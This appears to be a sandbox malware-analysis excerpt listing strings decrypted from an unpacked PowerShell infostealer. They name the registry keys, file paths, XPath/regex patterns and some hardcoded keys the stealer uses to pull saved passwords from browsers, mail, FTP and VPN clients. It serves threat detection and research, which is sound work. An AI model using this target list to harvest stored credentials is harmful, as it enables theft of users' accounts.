Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: logins
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: IE/Edge
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Windows Secure Note
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Windows Web Password Credential
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Windows Credential Picker Protector
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Web Credentials
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Windows Credentials
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Windows Domain Certificate Credential
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Windows Domain Password Credential
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Windows Extended Credential
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: 00000000-0000-0000-0000-000000000000
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: SchemaId
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: pResourceElement
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: pIdentityElement
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: pPackageSid
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: pAuthenticatorElement
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: IE/Edge
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: UC Browser
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: UCBrowser\
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Login Data
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: journal
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: wow_logins
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Safari for Windows
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Apple Computer\Preferences\keychain.plist
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <array>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <dict>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <string>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: </string>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <string>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: </string>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <data>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: </data>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: -convert xml1 -s -o "
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \fixed_keychain.xml"
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Microsoft\Protect\
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: credential
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: QQ Browser
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Tencent\QQBrowser\User Data
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Default\EncryptedStorage
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Profile
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \EncryptedStorage
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: entries
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: category
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Password
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: str3
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: str2
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: blob0
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: password_value
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: IncrediMail
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: PopPassword
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: SmtpPassword
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Software\IncrediMail\Identities\
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Accounts_New
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: PopPassword
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: SmtpPassword
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: SmtpServer
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: EmailAddress
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Eudora
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Software\Qualcomm\Eudora\CommandLine\
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: current
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Settings
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: SavePasswordText
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Settings
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ReturnAddress
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Falkon Browser
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \falkon\profiles\
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: profiles.ini
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: startProfile=([A-z0-9\/\.\"]+)
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: profiles.ini
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \browsedata.db
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: autofill
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ClawsMail
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Claws-mail
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \clawsrc
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \clawsrc
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: passkey0
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: master_passphrase_salt=(.+)
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: master_passphrase_pbkdf2_rounds=(.+)
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \accountrc
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: smtp_server
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: address
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: account
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \passwordstorerc
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: {(.),(.)}(.*)
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Flock Browser
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: APPDATA
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Flock\Browser\
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: signons3.txt
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: DynDns
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ALLUSERSPROFILE
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Dyn\Updater\config.dyndns
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: username=
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: password=
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: https://account.dyn.com/
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: t6KzXhCh
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ALLUSERSPROFILE
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Dyn\Updater\daemon.cfg
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: global
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: accounts
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: account.
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: username
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: account.
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: password
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Psi/Psi+
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: name
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: password
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Psi/Psi+
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: APPDATA
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Psi\profiles
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: APPDATA
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Psi+\profiles
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \accounts.xml
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \accounts.xml
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: OpenVPN
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Software\OpenVPN-GUI\configs
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Software\OpenVPN-GUI\configs
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Software\OpenVPN-GUI\configs\
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: username
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: auth-data
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: entropy
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: USERPROFILE
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \OpenVPN\config\
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: remote
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: remote
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: NordVPN
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: NordVPN
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: NordVpn.exe*
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: user.config
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: //setting[@name='Username']/value
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: //setting[@name='Password']/value
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: NordVPN
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Private Internet Access
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: %ProgramW6432%
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Private Internet Access\data
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Private Internet Access\data
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \account.json
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ."username":"(.?)"
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ."password":"(.?)"
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Private Internet Access
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: privateinternetaccess.com
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: FileZilla
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: APPDATA
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: APPDATA
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <Server>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <Host>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <Host>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: </Host>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <Port>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: </Port>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <User>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <User>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: </User>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <Pass encoding="base64">
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <Pass encoding="base64">
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: </Pass>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <Pass>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <Pass encoding="base64">
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: </Pass>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: CoreFTP
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: SOFTWARE\FTPWare\COREFTP\Sites
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: User
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Host
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Port
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: hdfzpysvpzimorhk
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: WinSCP
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: HostName
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: UserName
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Password
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: PublicKeyFile
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: PortNumber
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: [PRIVATE KEY LOCATION: "{0}"]
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: WinSCP
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ABCDEF
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Flash FXP
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: port
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: user
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: pass
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: quick.dat
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Sites.dat
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \FlashFXP\
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \FlashFXP\
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: FTP Navigator
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: SystemDrive
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \FTP Navigator\Ftplist.txt
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Server
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Password
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: No Password
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: User
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: SmartFTP
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: APPDATA
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: WS_FTP
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: appdata
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: HOST
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: PWD=
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: PWD=
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: FtpCommander
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: SystemDrive
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: SystemDrive
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: SystemDrive
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \cftp\Ftplist.txt
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ;Password=
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ;User=
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ;Server=
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ;Port=
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ;Port=
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ;Password=
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ;User=
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: ;Anonymous=
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: FTPGetter
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \FTPGetter\servers.xml
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <server>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <server_ip>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <server_ip>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: </server_ip>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <server_port>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: </server_port>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <server_user_name>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <server_user_name>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: </server_user_name>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <server_user_password>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: <server_user_password>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: </server_user_password>
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: FTPGetter
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: The Bat!
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: appdata
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \The Bat!
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Account.CFN
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Account.CFN
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Becky!
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: DataDir
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Folder.lst
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Mailbox.ini
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Account
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: PassWd
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Account
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: SMTPServer
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Account
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: MailAddress
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Becky!
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Outlook
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Email
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: IMAP Password
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: POP3 Password
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: HTTP Password
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: SMTP Password
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Email
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Email
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Email
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: IMAP Password
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: POP3 Password
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: HTTP Password
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: SMTP Password
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Server
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Windows Mail App
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Software\Microsoft\ActiveSync\Partners
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Email
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Server
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: SchemaId
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: pResourceElement
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: pIdentityElement
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: pPackageSid
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: pAuthenticatorElement
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: syncpassword
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: mailoutgoing
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: FoxMail
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Executable
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: FoxmailPath
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Storage\
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Storage\
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \mail
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \mail
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Accounts\Account.rec0
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Accounts\Account.rec0
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Account.stg
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: \Account.stg
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: POP3Host
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: SMTPHost
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: IncomingServer
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Account
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: MailAddress
Source: 4.2.powershell.exe.5eb2e30.5.raw.unpack	String decryptor: Password
